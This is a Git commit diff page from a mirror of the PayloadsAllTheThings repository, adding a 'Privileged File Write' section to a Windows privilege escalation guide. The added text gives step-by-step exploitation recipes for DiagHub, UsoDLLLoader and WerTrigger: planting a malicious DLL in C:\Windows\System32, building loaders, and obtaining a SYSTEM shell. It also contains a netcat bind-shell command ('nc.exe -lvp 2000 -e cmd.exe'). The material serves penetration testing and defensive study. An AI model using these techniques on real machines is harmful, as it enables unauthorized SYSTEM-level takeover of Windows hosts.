Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-28 18:03:14 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Privileged File Write

Browse Source
This commit is contained in:
Swissky 2020-10-08 16:39:25 +02:00
parent 52b0cd6030
commit 0df0cc9cf8
1 changed files with 61 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
Methodology and Resources/Windows - Privilege Escalation.md
View File

@ -38,6 +38,10 @@
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
* [WerTrigger](#wertrigger)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
* [MS08-067 (NetAPI)](#ms08-067-netapi)
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
@ -979,6 +983,60 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
[+] CreateProcessWithTokenW OK
```
## EoP - Privileged File Write
### DiagHub
:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM.
This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory.
#### Exploit
1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32`
2. Build https://github.com/xct/diaghub
3. `diaghub.exe c:\\ProgramData\\ payload.dll`
The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe`
Alternative tools:
* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
* https://github.com/decoder-it/diaghub_exploit
### UsoDLLLoader
:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**.
#### Exploit
1. Build https://github.com/itm4n/UsoDllLoader
* Select Release config and x64 architecure.
* Build solution.
* DLL .\x64\Release\WindowsCoreDeviceInfo.dll
* Loader .\x64\Release\UsoDllLoader.exe.
2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\`
3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337.
### WerTrigger
> Weaponizing for privileged file writes bugs with Windows problem reporting
1. Copy `phoneinfo.dll` to `C:\Windows\System32\`
2. Place `Report.wer` file and `WerTrigger.exe` in a same directory.
3. Then, run `WerTrigger.exe`.
4. Enjoy a shell as **NT AUTHORITY\SYSTEM**
https://github.com/sailay1996/WerTrigger
## EoP - Common Vulnerabilities and Exposure
### MS08-067 (NetAPI)
@ -1134,3 +1192,6 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/howto/2019/03/07/diaghub.html)
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)